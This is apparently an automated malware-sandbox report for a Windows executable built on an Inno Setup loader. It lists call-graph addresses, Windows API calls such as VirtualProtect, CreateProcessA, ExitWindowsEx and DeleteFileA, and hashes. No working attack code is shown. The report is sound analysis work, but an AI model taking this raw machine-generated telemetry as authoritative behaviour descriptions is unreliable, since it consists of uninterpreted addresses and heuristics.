404323 6314->6316 6315->6313 6315->6314 6317 402c08 6320 402c82 6317->6320 6321 402c19 6317->6321 6318 402c56 RtlUnwind 6319 403154 4 API calls 6318->6319 6319->6320 6321->6318 6321->6320 6324 402b28 6321->6324 6325 402b31 RaiseException 6324->6325 6326 402b47 6324->6326 6325->6326 6326->6318 6327 408c10 6328 408c17 6327->6328 6329 403198 4 API calls 6328->6329 6337 408cb1 6329->6337 6330 408cdc 6331 4031b8 4 API calls 6330->6331 6333 408d69 6331->6333 6332 408cc8 6335 4032fc 4 API calls 6332->6335 6334 403278 4 API calls 6334->6337 6335->6330 6336 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6336->6337 6337->6330 6337->6332 6337->6334 6337->6336 6338 40a011 6339 40a036 6338->6339 6340 407918 InterlockedExchange 6339->6340 6342 40a060 6340->6342 6341 40a070 6348 4076ac SetEndOfFile 6341->6348 6342->6341 6343 409aa0 4 API calls 6342->6343 6343->6341 6345 40a08c 6346 4025ac 4 API calls 6345->6346 6347 40a0c3 6346->6347 6349 4076c3 6348->6349 6350 4076bc 6348->6350 6349->6345 6351 40748c 21 API calls 6350->6351 6351->6349 6763 409916 6764 409918 6763->6764 6765 40993a 6764->6765 6766 409956 CallWindowProcA 6764->6766 6766->6765 6079 407017 6080 407008 SetErrorMode 6079->6080 6356 403018 6357 403070 6356->6357 6358 403025 6356->6358 6359 40302a RtlUnwind 6358->6359 6360 40304e 6359->6360 6362 402f78 6360->6362 6363 402be8 6360->6363 6364 402bf1 RaiseException 6363->6364 6365 402c04 6363->6365 6364->6365 6365->6357 6773 409918 6774 409927 6773->6774 6775 40993a 6773->6775 6774->6775 6776 409956 CallWindowProcA 6774->6776 6776->6775 6370 40901e 6371 409010 6370->6371 6372 408fac Wow64RevertWow64FsRedirection 6371->6372 6373 409018 6372->6373 6374 409020 SetLastError 6375 409029 6374->6375 6386 403a28 ReadFile 6387 403a46 6386->6387 6388 403a49 GetLastError 6386->6388 6217 40762c ReadFile 6218 407663 6217->6218 6219 40764c 6217->6219 6220 407652 GetLastError 6219->6220 6221 40765c 6219->6221 6220->6218 6220->6221 6222 40748c 21 API calls 6221->6222 6222->6218 6393 40a02c 6394 409aa0 4 API calls 6393->6394 6395 40a031 6394->6395 6396 40a036 6395->6396 6397 402f24 5 API calls 6395->6397 6398 407918 InterlockedExchange 6396->6398 6397->6396 6399 40a060 6398->6399 6400 40a070 6399->6400 6401 409aa0 4 API calls 6399->6401 6402 4076ac 22 API calls 6400->6402 6401->6400 6403 40a08c 6402->6403 6404 4025ac 4 API calls 6403->6404 6405 40a0c3 6404->6405 6777 40712e 6778 407118 6777->6778 6779 403198 4 API calls 6778->6779 6780 407120 6779->6780 6781 403198 4 API calls 6780->6781 6782 407128 6781->6782 6783 408f30 6786 408dfc 6783->6786 6787 408e05 6786->6787 6788 403198 4 API calls 6787->6788 6789 408e13 6787->6789 6788->6787 6790 403932 6791 403924 6790->6791 6794 40374c 6791->6794 6793 40392c 6795 403766 6794->6795 6796 403759 6794->6796 6795->6793 6796->6795 6797 403779 VariantClear 6796->6797 6797->6793 6028 4075c4 SetFilePointer 6029 4075f7 6028->6029 6030 4075e7 GetLastError 6028->6030 6030->6029 6031 4075f0 6030->6031 6032 40748c 21 API calls 6031->6032 6032->6029 6406 405ac4 6407 405acc 6406->6407 6411 405ad4 6406->6411 6408 405ad2 6407->6408 6409 405adb 6407->6409 6413 405a3c 6408->6413 6410 405930 5 API calls 6409->6410 6410->6411 6420 405a44 6413->6420 6414 405a5e 6416 405a63 6414->6416 6417 405a7a 6414->6417 6415 403154 4 API calls 6415->6420 6418 405930 5 API calls 6416->6418 6419 403154 4 API calls 6417->6419 6421 405a76 6418->6421 6422 405a7f 6419->6422 6420->6414 6420->6415 6424 403154 4 API calls 6421->6424 6423 4059a0 19 API calls 6422->6423 6423->6421 6425 405aa8 6424->6425 6426 403154 4 API calls 6425->6426 6427 405ab6 6426->6427 6427->6411 6428 4076c8 WriteFile 6429 4076e8 6428->6429 6430 4076ef 6428->6430 6431 40748c 21 API calls 6429->6431 6432 407700 6430->6432 6433 4073ec 20 API calls 6430->6433 6431->6430 6433->6432 6434 40a2ca 6443 4096fc 6434->6443 6437 402f24 5 API calls 6438 40a2d4 6437->6438 6439 403198 4 API calls 6438->6439 6440 40a2f3 6439->6440 6441 403198 4 API calls 6440->6441 6442 40a2fb 6441->6442 6452 40569c 6443->6452 6445 409717 6447 409745 6445->6447 6458 40720c 6445->6458 6449 403198 4 API calls 6447->6449 6448 409735 6451 40973d MessageBoxA 6448->6451 6450 40975a 6449->6450 6450->6437 6451->6447 6453 403154 4 API calls 6452->6453 6454 4056a1 6453->6454 6455 4056b9 6454->6455 6456 403154 4 API calls 6454->6456 6455->6445 6457 4056af 6456->6457 6457->6445 6459 40569c 4 API calls 6458->6459 6460 40721b 6459->6460 6461 407221 6460->6461 6462 40722f 6460->6462 6463 40322c 4 API calls 6461->6463 6464 40723f 6462->6464 6466 40724b 6462->6466 6467 40722d 6463->6467 6469 4071d0 6464->6469 6476 4032b8 6466->6476 6467->6448 6470 40322c 4 API calls 6469->6470 6471 4071df 6470->6471 6472 4071fc 6471->6472 6473 406950 CharPrevA 6471->6473 6472->6467 6474 4071eb 6473->6474 6474->6472 6475 4032fc 4 API calls 6474->6475 6475->6472 6477 403278 4 API calls 6476->6477 6478 4032c2 6477->6478 6478->6467 6479 402ccc 6480 402cdd 6479->6480 6484 402cfe 6479->6484 6481 402d88 RtlUnwind 6480->6481 6483 402b28 RaiseException 6480->6483 6480->6484 6482 403154 4 API calls 6481->6482 6482->6484 6485 402d7f 6483->6485 6485->6481 6806 403fcd 6807 403f07 4 API calls 6806->6807 6808 403fd6 6807->6808 6809 403e9c 4 API calls 6808->6809 6810 403fe2 6809->6810 5464 4024d0 5465 4024e4 5464->5465 5466 4024f7 5464->5466 5503 401918 RtlInitializeCriticalSection 5465->5503 5468 402518 5466->5468 5469 40250e RtlEnterCriticalSection 5466->5469 5480 402300 5468->5480 5469->5468 5472 4024ed 5474 402525 5477 402581 5474->5477 5478 402577 RtlLeaveCriticalSection 5474->5478 5476 402531 5476->5474 5510 40215c 5476->5510 5478->5477 5481 402314 5480->5481 5482 402335 5481->5482 5483 4023b8 5481->5483 5485 402344 5482->5485 5524 401b74 5482->5524 5483->5485 5488 402455 5483->5488 5527 401d80 5483->5527 5535 401e84 5483->5535 5485->5474 5490 401fd4 5485->5490 5488->5485 5531 401d00 5488->5531 5491 401fe8 5490->5491 5492 401ffb 5490->5492 5493 401918 4 API calls 5491->5493 5494 402012 RtlEnterCriticalSection 5492->5494 5497 40201c 5492->5497 5495 401fed 5493->5495 5494->5497 5495->5492 5496 401ff1 5495->5496 5500 402052 5496->5500 5497->5500 5617 401ee0 5497->5617 5500->5476 5501 402147 5501->5476 5502 40213d RtlLeaveCriticalSection 5502->5501 5504 40193c RtlEnterCriticalSection 5503->5504 5505 401946 5503->5505 5504->5505 5506 401964 LocalAlloc 5505->5506 5507 40197e 5506->5507 5508 4019c3 RtlLeaveCriticalSection 5507->5508 5509 4019cd 5507->5509 5508->5509 5509->5466 5509->5472 5511 40217a 5510->5511 5512 402175 5510->5512 5513 4021ab RtlEnterCriticalSection 5511->5513 5516 4021b5 5511->5516 5520 40217e 5511->5520 5514 401918 4 API calls 5512->5514 5513->5516 5514->5511 5515 4021c1 5518 4022e3 RtlLeaveCriticalSection 5515->5518 5519 4022ed 5515->5519 5516->5515 5517 402244 5516->5517 5522 402270 5516->5522 5517->5520 5521 401d80 7 API calls 5517->5521 5518->5519 5519->5474 5520->5474 5521->5520 5522->5515 5523 401d00 7 API calls 5522->5523 5523->5515 5525 40215c 9 API calls 5524->5525 5526 401b95 5525->5526 5526->5485 5528 401d92 5527->5528 5529 401d89 5527->5529 5528->5483 5529->5528 5530 401b74 9 API calls 5529->5530 5530->5528 5532 401d1e 5531->5532 5533 401d4e 5531->5533 5532->5485 5533->5532 5540 401c68 5533->5540 5595 401768 5535->5595 5537 401e99 5538 401ea6 5537->5538 5606 401dcc 5537->5606 5538->5483 5541 401c7a 5540->5541 5542 401c9d 5541->5542 5543 401caf 5541->5543 5553 40188c 5542->5553 5544 40188c 3 API calls 5543->5544 5546 401cad 5544->5546 5547 401cc5 5546->5547 5563 401b44 5546->5563 5547->5532 5549 401cd4 5550 401cee 5549->5550 5568 401b98 5549->5568 5573 4013a0 5550->5573 5554 4018b2 5553->5554 5562 40190b 5553->5562 5577 401658 5554->5577 5559 4018e6 5561 4013a0 LocalAlloc 5559->5561 5559->5562 5561->5562 5562->5546 5564 401b61 5563->5564 5565 401b52 5563->5565 5564->5549 5566 401d00 9 API calls 5565->5566 5567 401b5f 5566->5567 5567->5549 5569 401bab 5568->5569 5570 401b9d 5568->5570 5569->5550 5571 401b74 9 API calls 5570->5571 5572 401baa 5571->5572 5572->5550 5574 4013ab 5573->5574 5575 4013c6 5574->5575 5576 4012e4 LocalAlloc 5574->5576 5575->5547 5576->5575 5579 40168f 5577->5579 5578 4016cf 5581 40132c 5578->5581 5579->5578 5580 4016a9 VirtualFree 5579->5580 5580->5579 5582 401348 5581->5582 5589 4012e4 5582->5589 5585 40150c 5587 40153b 5585->5587 5586 401594 5586->5559 5587->5586 5588 401568 VirtualFree 5587->5588 5588->5587 5592 40128c 5589->5592 5593 401298 LocalAlloc 5592->5593 5594 4012aa 5592->5594 5593->5594 5594->5559 5594->5585 5596 401787 5595->5596 5597 40183b 5596->5597 5598 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5596->5598 5600 40132c LocalAlloc 5596->5600 5601 401821 5596->5601 5602 4017d6 5596->5602 5603 4017e7 5597->5603 5613 4015c4 5597->5613 5598->5596 5600->5596 5604 40150c VirtualFree 5601->5604 5605 40150c VirtualFree 5602->5605 5603->5537 5604->5603 5605->5603 5607 401d80 9 API calls 5606->5607 5608 401de0 5607->5608 5609 40132c LocalAlloc 5608->5609 5610 401df0 5609->5610 5611 401b44 9 API calls 5610->5611 5612 401df8 5610->5612 5611->5612 5612->5538 5614 40160a 5613->5614 5615 401626 VirtualAlloc 5614->5615 5616 40163a 5614->5616 5615->5614 5615->5616 5616->5603 5621 401ef0 5617->5621 5618 401f1c 5619 401d00 9 API calls 5618->5619 5622 401f40 5618->5622 5619->5622 5621->5618 5621->5622 5623 401e58 5621->5623 5622->5501 5622->5502 5628 4016d8 5623->5628 5626 401dcc 9 API calls 5627 401e75 5626->5627 5627->5621 5632 4016f4 5628->5632 5630 4016fe 5631 4015c4 VirtualAlloc 5630->5631 5636 40170a 5631->5636 5632->5630 5633 40175b 5632->5633 5634 40132c LocalAlloc 5632->5634 5635 40174f 5632->5635 5638 401430 5632->5638 5633->5626 5633->5627 5634->5632 5637 40150c VirtualFree 5635->5637 5636->5633 5637->5633 5639 40143f VirtualAlloc 5638->5639 5641 40146c 5639->5641 5642 40148f 5639->5642 5643 4012e4 LocalAlloc 5641->5643 5642->5632 5644 401478 5643->5644 5644->5642 5645 40147c VirtualFree 5644->5645 5645->5642 6486 4028d2 6487 4028da 6486->6487 6488 403554 4 API calls 6487->6488 6489 4028ef 6487->6489 6488->6487 6490 4025ac 4 API calls 6489->6490 6491 4028f4 6490->6491 6811 4019d3 6812 4019ba 6811->6812 6813 4019c3 RtlLeaveCriticalSection 6812->6813 6814 4019cd 6812->6814 6813->6814 6033 407fd4 6034 407fe6 6033->6034 6036 407fed 6033->6036 6044 407f10 6034->6044 6037 408021 6036->6037 6039 408015 6036->6039 6040 408017 6036->6040 6038 40804e 6037->6038 6041 407d7c 19 API calls 6037->6041 6058 407e2c 6039->6058 6055 407d7c 6040->6055 6041->6038 6045 407f25 6044->6045 6046 407d7c 19 API calls 6045->6046 6047 407f34 6045->6047 6046->6047 6048 407f6e 6047->6048 6049 407d7c 19 API calls 6047->6049 6050 407f82 6048->6050 6051 407d7c 19 API calls 6048->6051 6049->6048 6054 407fae 6050->6054 6065 407eb8 6050->6065 6051->6050 6054->6036 6068 4058b4 6055->6068 6057 407d9e 6057->6037 6059 405184 19 API calls 6058->6059 6060 407e57 6059->6060 6076 407de4 6060->6076 6062 407e5f 6063 403198 4 API calls 6062->6063 6064 407e74 6063->6064 6064->6037 6066 407ec7 VirtualFree 6065->6066 6067 407ed9 VirtualAlloc 6065->6067 6066->6067 6067->6054 6069 4058c0 6068->6069 6070 405184 19 API calls 6069->6070 6071 4058ed 6070->6071 6072 4031e8 4 API calls 6071->6072 6073 4058f8 6072->6073 6074 403198 4 API calls 6073->6074 6075 40590d 6074->6075 6075->6057 6077 4058b4 19 API calls 6076->6077 6078 407e06 6077->6078 6078->6062 6496 40a0d5 6497 40a105 6496->6497 6498 40a10f CreateWindowExA SetWindowLongA 6497->6498 6499 405184 19 API calls 6498->6499 6500 40a192 6499->6500 6501 4032fc 4 API calls 6500->6501 6502 40a1a0 6501->6502 6503 4032fc 4 API calls 6502->6503 6504 40a1ad 6503->6504 6505 406b7c 5 API calls 6504->6505 6506 40a1b9 6505->6506 6507 4032fc 4 API calls 6506->6507 6508 40a1c2 6507->6508 6509 4099a4 29 API calls 6508->6509 6510 40a1d4 6509->6510 6511 409884 5 API calls 6510->6511 6512 40a1e7 6510->6512 6511->6512 6513 40a220 6512->6513 6514 4094d8 9 API calls 6512->6514 6515 40a239 6513->6515 6518 40a233 RemoveDirectoryA 6513->6518 6514->6513 6516 40a242 73A15CF0 6515->6516 6517 40a24d 6515->6517 6516->6517 6519 40a275 6517->6519 6520 40357c 4 API calls 6517->6520 6518->6515 6521 40a26b 6520->6521 6522 4025ac 4 API calls 6521->6522 6522->6519 6081 40a0e7 6082 40a0eb SetLastError 6081->6082 6113 409648 GetLastError 6082->6113 6085 40a105 6087 40a10f CreateWindowExA SetWindowLongA 6085->6087 6086 402f24 5 API calls 6086->6085 6088 405184 19 API calls 6087->6088 6089 40a192 6088->6089 6090 4032fc 4 API calls 6089->6090 6091 40a1a0 6090->6091 6092 4032fc 4 API calls 6091->6092 6093 40a1ad 6092->6093 6126 406b7c GetCommandLineA 6093->6126 6096 4032fc 4 API calls 6097 40a1c2 6096->6097 6131 4099a4 6097->6131 6100 409884 5 API calls 6101 40a1e7 6100->6101 6102 40a220 6101->6102 6103 40a207 6101->6103 6105 40a239 6102->6105 6108 40a233 RemoveDirectoryA 6102->6108 6147 4094d8 6103->6147 6106 40a242 73A15CF0 6105->6106 6107 40a24d 6105->6107 6106->6107 6109 40a275 6107->6109 6155 40357c 6107->6155 6108->6105 6111 40a26b 6112 4025ac 4 API calls 6111->6112 6112->6109 6114 404c84 19 API calls 6113->6114 6115 40968f 6114->6115 6116 407284 5 API calls 6115->6116 6117 40969f 6116->6117 6118 408da8 4 API calls 6117->6118 6119 4096b4 6118->6119 6120 405880 4 API calls 6119->6120 6121 4096c3 6120->6121 6122 4031b8 4 API calls 6121->6122 6123 4096e2 6122->6123 6124 403198 4 API calls 6123->6124 6125 4096ea 6124->6125 6125->6085 6125->6086 6127 406af0 4 API calls 6126->6127 6128 406ba1 6127->6128 6129 403198 4 API calls 6128->6129 6130 406bbf 6129->6130 6130->6096 6132 4033b4 4 API calls 6131->6132 6133 4099df 6132->6133 6134 409a11 CreateProcessA 6133->6134 6135 409a24 CloseHandle 6134->6135 6136 409a1d 6134->6136 6138 409a2d 6135->6138 6137 409648 21 API calls 6136->6137 6137->6135 6168 409978 6138->6168 6141 409a49 6142 409978 3 API calls 6141->6142 6143 409a4e GetExitCodeProcess CloseHandle 6142->6143 6144 409a6e 6143->6144 6145 403198 4 API calls 6144->6145 6146 409a76 6145->6146 6146->6100 6146->6101 6148 409532 6147->6148 6149 4094eb 6147->6149 6148->6102 6149->6148 6150 4094f3 Sleep 6149->6150 6151 409503 Sleep 6149->6151 6153 40951a GetLastError 6149->6153 6172 408fbc 6149->6172 6150->6149 6151->6149 6153->6148 6154 409524 GetLastError 6153->6154 6154->6148 6154->6149 6156 403591 6155->6156 6164 4035a0 6155->6164 6160 4035d0 6156->6160 6161 40359b 6156->6161 6163 4035b6 6156->6163 6157 4035b1 6162 403198 4 API calls 6157->6162 6158 4035b8 6159 4031b8 4 API calls 6158->6159 6159->6163 6160->6163 6166 40357c 4 API calls 6160->6166 6161->6164 6165 4035ec 6161->6165 6162->6163 6163->6111 6164->6157 6164->6158 6165->6163 6180 403554 6165->6180 6166->6160 6169 40998c PeekMessageA 6168->6169 6170 409980 TranslateMessage DispatchMessageA 6169->6170 6171 40999e MsgWaitForMultipleObjects 6169->6171 6170->6169 6171->6138 6171->6141 6173 408f70 2 API calls 6172->6173 6174 408fd2 6173->6174 6175 408fd6 6174->6175 6176 408ff2 DeleteFileA GetLastError 6174->6176 6175->6149 6177 409010 6176->6177 6178 408fac Wow64RevertWow64FsRedirection 6177->6178 6179 409018 6178->6179 6179->6149 6181 403566 6180->6181 6183 403578 6181->6183 6184 403604 6181->6184 6183->6165 6185 40357c 6184->6185 6186 4035a0 6185->6186 6190 4035d0 6185->6190 6191 40359b 6185->6191 6193 4035b6 6185->6193 6187 4035b1 6186->6187 6188 4035b8 6186->6188 6192 403198 4 API calls 6187->6192 6189 4031b8 4 API calls 6188->6189 6189->6193 6190->6193 6195 40357c 4 API calls 6190->6195 6191->6186 6194 4035ec 6191->6194 6192->6193 6193->6181 6194->6193 6196 403554 4 API calls 6194->6196 6195->6190 6196->6194 6818 402be9 RaiseException 6819 402c04 6818->6819 6529 402af2 6530 402afe 6529->6530 6533 402ed0 6530->6533 6534 403154 4 API calls 6533->6534 6536 402ee0 6534->6536 6535 402b03 6536->6535 6538 402b0c 6536->6538 6539 402b25 6538->6539 6540 402b15 RaiseException 6538->6540 6539->6535 6540->6539 6820 402dfa 6821 402e26 6820->6821 6822 402e0d 6820->6822 6824 402ba4 6822->6824 6825 402bc9 6824->6825 6826 402bad 6824->6826 6825->6821 6827 402bb5 RaiseException 6826->6827 6827->6825 6828 4075fa GetFileSize 6829 407626 6828->6829 6830 407616 GetLastError 6828->6830 6830->6829 6831 40761f 6830->6831 6832 40748c 21 API calls 6831->6832 6832->6829 6833 406ffb 6834 407008 SetErrorMode 6833->6834 6545 403a80 CloseHandle 6546 403a90 6545->6546 6547 403a91 GetLastError 6545->6547 6548 40a282 6549 40a1f4 6548->6549 6550 40a220 6549->6550 6551 4094d8 9 API calls 6549->6551 6552 40a239 6550->6552 6555 40a233 RemoveDirectoryA 6550->6555 6551->6550 6553 40a242 73A15CF0 6552->6553 6554 40a24d 6552->6554 6553->6554 6556 40a275 6554->6556 6557 40357c 4 API calls 6554->6557 6555->6552 6558 40a26b 6557->6558 6559 4025ac 4 API calls 6558->6559 6559->6556 6560 404283 6561 4042c3 6560->6561 6562 403154 4 API calls 6561->6562 6563 404323 6562->6563 6835 404185 6836 4041ff 6835->6836 6837 4041cc 6836->6837 6838 403154 4 API calls 6836->6838 6839 404323 6838->6839 6564 40a287 6565 40a290 6564->6565 6567 40a2bb 6564->6567 6574 409448 6565->6574 6569 403198 4 API calls 6567->6569 6568 40a295 6568->6567 6571 40a2b3 MessageBoxA 6568->6571 6570 40a2f3 6569->6570 6572 403198 4 API calls 6570->6572 6571->6567 6573 40a2fb 6572->6573 6575 409454 GetCurrentProcess OpenProcessToken 6574->6575 6576 4094af ExitWindowsEx 6574->6576 6577 409466 6575->6577 6578 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6575->6578 6576->6577 6577->6568 6578->6576 6578->6577 6579 403e87 6581 403e4c 6579->6581 6580 403e67 6586 403e78 6580->6586 6592 402674 6580->6592 6581->6580 6582 403e62 6581->6582 6583 403e7b 6581->6583 6588 403cc8 6582->6588 6585 402674 4 API calls 6583->6585 6585->6586 6589 403cd6 6588->6589 6590 402674 4 API calls 6589->6590 6591 403ceb 6589->6591 6590->6591 6591->6580 6593 403154 4 API calls 6592->6593 6594 40267a 6593->6594 6594->6586 6599 407e90 6600 407eb8 VirtualFree 6599->6600 6601 407e9d 6600->6601 6848 403991 6849 403983 6848->6849 6850 40374c VariantClear 6849->6850 6851 40398b 6850->6851 6852 405b92 6854 405b94 6852->6854 6853 405bd0 6857 405930 5 API calls 6853->6857 6854->6853 6855 405be7 6854->6855 6856 405bca 6854->6856 6861 404ccc 5 API calls 6855->6861 6856->6853 6858 405c3c 6856->6858 6859 405be3 6857->6859 6860 4059a0 19 API calls 6858->6860 6862 403198 4 API calls 6859->6862 6860->6859 6863 405c10 6861->6863 6864 405c76 6862->6864 6865 4059a0 19 API calls 6863->6865 6865->6859 6604 403e95 6605 403e4c 6604->6605 6606 403e62 6605->6606 6607 403e7b 6605->6607 6610 403e67 6605->6610 6608 403cc8 4 API calls 6606->6608 6609 402674 4 API calls 6607->6609 6608->6610 6611 403e78 6609->6611 6610->6611 6612 402674 4 API calls 6610->6612 6612->6611 6613 403a97 6614 403aac 6613->6614 6615 403bbc GetStdHandle 6614->6615 6616 403b0e CreateFileA 6614->6616 6626 403ab2 6614->6626 6617 403c17 GetLastError 6615->6617 6621 403bba 6615->6621 6616->6617 6618 403b2c 6616->6618 6617->6626 6620 403b3b GetFileSize 6618->6620 6618->6621 6620->6617 6622 403b4e SetFilePointer 6620->6622 6623 403be7 GetFileType 6621->6623 6621->6626 6622->6617 6627 403b6a ReadFile 6622->6627 6625 403c02 CloseHandle 6623->6625 6623->6626 6625->6626 6627->6617 6628 403b8c 6627->6628 6628->6621 6629 403b9f SetFilePointer 6628->6629 6629->6617 6630 403bb0 SetEndOfFile 6629->6630 6630->6617 6630->6621 6884 4011aa 6885 4011ac GetStdHandle 6884->6885 6223 4076ac SetEndOfFile 6224 4076c3 6223->6224 6225 4076bc 6223->6225 6226 40748c 21 API calls 6225->6226 6226->6224 6634 4028ac 6635 402594 4 API calls 6634->6635 6636 4028b6 6635->6636 6637 401ab9 6638 401a96 6637->6638 6639 401aa9 RtlDeleteCriticalSection 6638->6639 6640 401a9f RtlLeaveCriticalSection 6638->6640 6640->6639

                                                                                                      Executed Functions

                                                                                                      Function 00409B30 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 127 409b97 124->127 128 409b99-409b9b 124->128 125->124 126 409b7a-409b7d 125->126 126->124 129 409b7f-409b82 126->129 127->128 130 409baa-409bad 128->130 129->124 129->128 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 134 409bb3-409bc0 VirtualProtect 132->134 134->121
                                                                                                      APIs
                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                                                      • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                                                      • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2441996862-0
                                                                                                      • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                                      • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                                                      • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                                      • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                                                      Function 004051FC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 2299586839-0
                                                                                                      • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                                      • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                                                      • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                                      • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE
                                                                                                      Function 0040457C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                                      • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                      • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                      • API String ID: 3256987805-3653653586
                                                                                                      • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                      • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                                      • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                      • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E
                                                                                                      Function 0040A0E7 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 111COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • SetLastError.KERNEL32 ref: 0040A0F4
                                                                                                        • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,021B15A4), ref: 0040966C
                                                                                                      • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                                      • SetWindowLongA.USER32(00020420,000000FC,00409918), ref: 0040A148
                                                                                                      • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                                      • 73A15CF0.USER32(00020420,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
